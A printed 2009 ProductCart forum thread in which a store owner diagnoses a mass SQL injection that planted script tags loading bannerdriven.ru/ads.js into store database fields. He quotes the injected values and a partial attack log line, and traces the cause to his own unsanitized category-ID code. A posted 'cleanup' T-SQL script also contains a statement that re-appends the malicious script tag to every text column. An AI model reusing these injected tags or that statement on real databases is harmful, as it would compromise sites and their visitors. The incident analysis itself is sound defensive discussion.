Print Page | Close Window

SQL injection victim?

Printed From: ProductCart E-Commerce Solutions
Category: ProductCart
Forum Name: Using ProductCart
Forum Description: Running your store with ProductCart
URL: https://forum.productcart.com/forum_posts.asp?TID=3062
Printed Date: 28-February-2025 at 1:44pm
Software Version: Web Wiz Forums 12.04 - http://www.webwizforums.com


Topic: SQL injection victim?
Posted By: BrianRoden
Subject: SQL injection victim?
Date Posted: 25-September-2009 at 12:23pm
This morning our ProductCart 3.51 store was taking forever to load. When the home page finally came up, all the buttons under the featured items were red X's with text, which threw our columns totally off.
 
I right-clicked on the box where the button should be and looked at properties. After the .gif in the image filename was some script pointing to bannerdriven.ru/ads.js. I started digging around. The layout and icons tables had been modified with this script at the end of each value. The pcStoreSettings had also been altered with these script tags inserted into various fields:
 

Store closed message: The store is temporarily closed so we can perform a software upgrade. Please try back after 10:00 a.m. CDT.<script src=http://www.bannerdriven.ru/ads.js></script><script src=http://www.bannerdriven.ru/ads.js></script>

 

SSL URL: https://www.ourregularurl.com%3cscript - https://www.ourregularurl.com<script src=http://www.bannerdriven.ru/ads.js></script><script src=http://www.bannerdriven.ru/ads.js></script>

 

Home page: <script src=http://www.bannerdriven.ru/ads.js></script><script src=http://www.bannerdriven.ru/ads.js></script>

More digging shows other tables have been affected, like Orders.

This looks like a SQL injection attack. We have the Windows firewall on the Win2008 web server where this site runs set to only allow direct SQL TCP/IP connections from the web server itself and our office's dedicated IP block (we use SQL replication for a couple of databases that drive other websites on this server)
 
I googled bannerdriven.ru and it looks like lots of sites have had their script injected into fields.


Replies:
Posted By: Hamish
Date Posted: 25-September-2009 at 12:43pm
Hi,  
You will need to get the database restored from a backup and investigate the logs to see if you can determine the source of the breach.We are not aware of any exploitable vulnerabilities in ProductCart v3.51 code.

If you have made modifications please make sure the data is sanatized correctly, see
- http://wiki.earlyimpact.com/how_to/sanitize_strings - http://wiki.earlyimpact.com/how_to/sanitize_strings  

Also see
- http://wiki.earlyimpact.com/productcart/securityrec#stores_using_a_ms_sql_database - http://wiki.earlyimpact.com/productcart/securityrec#stores_using_a_ms_sql_database

I would also recommend checking that no other files on the site have been modified.

Hamish


-------------
Editing ProductCart Code?

See http://wiki.earlyimpact.com/developers/editcode" rel="nofollow - WIKI Guidelines for Editing ProductCart's ASP Source Code


Posted By: ProductCart
Date Posted: 25-September-2009 at 12:43pm
Brian,

we don't have any reports of any vulnerabilities in ProductCart v3.51. In our experience, the number one source of security holes is custom code:

- have you modified any of the source code?
- are you running any add-on's not provided by Early Impact?

Since some of the information might be confidential, we recommend that you open a support ticket.

-------------
The ProductCart Team

Home of ProductCart http://www.productcart.com" rel="nofollow - shopping cart software

Posted By: ProductCart
Date Posted: 25-September-2009 at 12:46pm
Two of us posted at the same time :-)

The idea is the same, as you can see. You need to review any modifications ever made to your ProductCart source code to ensure that they did not introduce a security issue.

-------------
The ProductCart Team

Home of ProductCart http://www.productcart.com" rel="nofollow - shopping cart software

Posted By: BrianRoden
Date Posted: 25-September-2009 at 1:21pm
Using GreyBeard's session saver add-in.
 
We've made minor mods to source code on some of our PC sites (we have 3). Rearranging layouts, changing the Continue Shopping button on the shopping cart page to go back to the category the user just bought from, instead of back to the home page.
 
We added an RSS feed as an ASPX app in a subfolder to display the newest products per category for people who want to subscribe to get updates on their craft of interest. It accesses the same DB and works off an URL that has a category ID passed in the query string. Wonder if someone used the RSS URL.
 
I'll check the ISS logs.

Posted By: ProductCart
Date Posted: 25-September-2009 at 1:29pm
Yes, the query string that carries the category ID would be the first thing to review. Incorrectly sanitizing a query string is normally the number one culprit for SQL injection.

-------------
The ProductCart Team

Home of ProductCart http://www.productcart.com" rel="nofollow - shopping cart software

Posted By: BrianRoden
Date Posted: 25-September-2009 at 1:43pm
The RSS feed is its own app in ISS, with its own separate log files, new file each day. The last log file was from 9/18/09. Doesn't look like this was the vector, or we would have had an entry for yesterday. We know yesterday is when the problem started, because Thursday night's DB backup was clean and we were able to restore it to get the DB back to normal.
 
Searching the ISS log for the PC site, the first occurrence of bannerdriven.ru shows up at 4:40 p.m. yesterday. I'm going to keep digging.

Posted By: BrianRoden
Date Posted: 25-September-2009 at 3:15pm
Found this page
 
http://www.sophos.com/blogs/sophoslabs/v/post/1329 - http://www.sophos.com/blogs/sophoslabs/v/post/1329
 
then searched yesterday's IIS log for this site for the string SET%20 and found this
 

2009-09-24 16:40:03 W3SVC6487 servername se.rv.er.ip GET /cart/pc/viewCategories.asp idCategory=2;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C4152452040542056 

(I've omitted the full string for security purposes)
 
I'll open a support ticket with the complete string

Posted By: BrianRoden
Date Posted: 25-September-2009 at 4:00pm
Found the problem. We had added some code in the footer.asp to check the current category and work back up the tree to the top-level category, then insert banner ad code from an Excel file based on the top-level category. I failed to check the idCategory with validNum, which allowed the stuff after the semicolon to get through.
 
I do most of my development in ASP.net, using object data source and parameterized queries with stored procedures that check stuff on the back end.  Not used to doing it the classic ASP way.

Posted By: ProductCart
Date Posted: 25-September-2009 at 5:04pm
Hi Brian,

Thanks for updating the post with this information. It's a good reminder for everyone to make sure all database input is sanitized per the instructions on the following page from our WIKI:

http://wiki.earlyimpact.com/how_to/sanitize_strings - http://wiki.earlyimpact.com/how_to/sanitize_strings

Sincerely,

Early Impact


-------------
The ProductCart Team

Home of ProductCart http://www.productcart.com" rel="nofollow - shopping cart software

Posted By: stsomeware
Date Posted: 06-October-2009 at 3:25pm
I have written a little SQL Query to clean up our database after an attack. I cannot guarentee it will work for anyone else, but I have run it on 2 separate ProductCart stores that I work with and it worked just fine without losing any data. You will just need to change the <script src=http://www.bannerdriven.ru/ads.js></script>
 to the link that has been injected into your database.
 
Here it is:
 

DECLARE @T varchar(255), @C varchar(255);

DECLARE Table_Cursor CURSOR FOR

SELECT a.name, b.name

FROM sysobjects a, syscolumns b

WHERE a.id = b.id AND a.xtype = 'u' AND

(b.xtype = 99 OR

b.xtype = 35 OR

b.xtype = 231 OR

b.xtype = 167);

OPEN Table_Cursor;

FETCH NEXT FROM Table_Cursor INTO @T, @C;

WHILE (@@FETCH_STATUS = 0) BEGIN

EXEC(

'update ['+@T+'] set ['+@C+'] = left(

convert(varchar(8000), ['+@C+']),

len(convert(varchar(8000), ['+@C+'])) - 6 -

patindex(''%tpircs<%'',

reverse(convert(varchar(8000), ['+@C+'])))

)

where ['+@C+'] like ''%<script%</script>'''

);

FETCH NEXT FROM Table_Cursor INTO @T, @C;

END;

CLOSE Table_Cursor;

DEALLOCATE Table_Cursor;

 

EXEC(

'update [' + @T + '] set [' + @C + '] =

rtrim(convert(varchar,[' + @C + ']))+

''<script src=http://www.bannerdriven.ru/ads.js></script>'''

);

 

EXEC(

'update ['+@T+'] set ['+@C+'] = left(

convert(varchar(8000), ['+@C+']),

len(convert(varchar(8000), ['+@C+'])) - 6 -

patindex(''%tpircs<%'',

reverse(convert(varchar(8000), ['+@C+'])))

)

where ['+@C+'] like ''<script src=http://www.bannerdriven.ru/ads.js></script>'''

);


Print Page | Close Window

Forum Software by Web Wiz Forums® version 12.04 - http://www.webwizforums.com
Copyright ©2001-2021 Web Wiz Ltd. - https://www.webwiz.net